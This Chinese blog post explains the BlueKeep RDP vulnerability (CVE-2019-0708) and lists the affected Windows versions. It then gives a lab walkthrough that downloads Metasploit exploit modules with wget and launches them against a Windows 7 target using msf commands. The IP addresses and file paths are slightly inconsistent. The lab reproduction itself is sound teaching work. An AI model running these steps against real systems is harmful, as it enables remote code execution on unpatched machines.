标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2024-2650]   作者: 浩丶轩 发表于: [2020-04-24]

本文共 [330] 位读者顶过

2019年5月14日,微软发布了针对远程桌面服务的关键远程执行代码漏洞CVE-2019-0708的补丁,该漏洞影响某些旧版本的Windows。攻击者一旦成功触发该漏洞,便可以在目标系统上执行任意代码,该漏洞的触发无需任何用户交互操作。这就意味着,存在漏洞的计算机只要联网,无需任何操作,就可能遭遇黑客远程攻击,运行恶意代码。其方式与2017年WannaCry恶意软件的传播方式类似。成功利用此漏洞的攻击者可以在目标系统完成安装应用程序,查看、更改或删除数据,创建完全访问权限的新账户等操作

影响版本

[出自:jiwo.org]

该漏洞影响旧版本的Windows系统,包括:Windows 7、Windows Server 2008 R2、Windows Server 2008、Windows 2003、Windows XP。

Windows 8和Windows 10及之后版本不受此漏洞影响。

漏洞测试环境

攻击机:kali   ip:192.168.0.129

靶机:win7     ip:192.168.0.133
kali:

下载攻击套件

wget https://raw.githubusercontent.co ... core/exploit/rdp.rb
wget https://github.com/rapid7/metasp ... /rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasp ... 19_0708_bluekeep.rb

将下面的exp分别进行替换

/usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb

/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

更新msf

apt-get update

apt-get install metasploit-framework

更新之后可能显示要更新一个插件  更新了之后就可以正常使用了

打开虚拟机win7

开放3389端口

打开kali启动msf

搜索0708,可以看到文件成功加载


使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce启用0708RDP模块攻击

用show options进行参数设置

这里只需要设置两项,set rhosts 目标ip(我这里是192.168.0.132,以及set target 3

set target ID数字(可选为0-4)设置受害机机器架构,wmware=3,Virtualbox=2成功利用。

有部分能成功拿到权限

到目前公开的利用代码可用于攻击 Windows 7 SP1 x64 与 Windows 2008 R2 x64的EXP不太稳定,针对 Windows 7 SP1 x64攻击有蓝屏现象。

评论

暂无
发表评论
 返回顶部 
热度(330)
 关注微信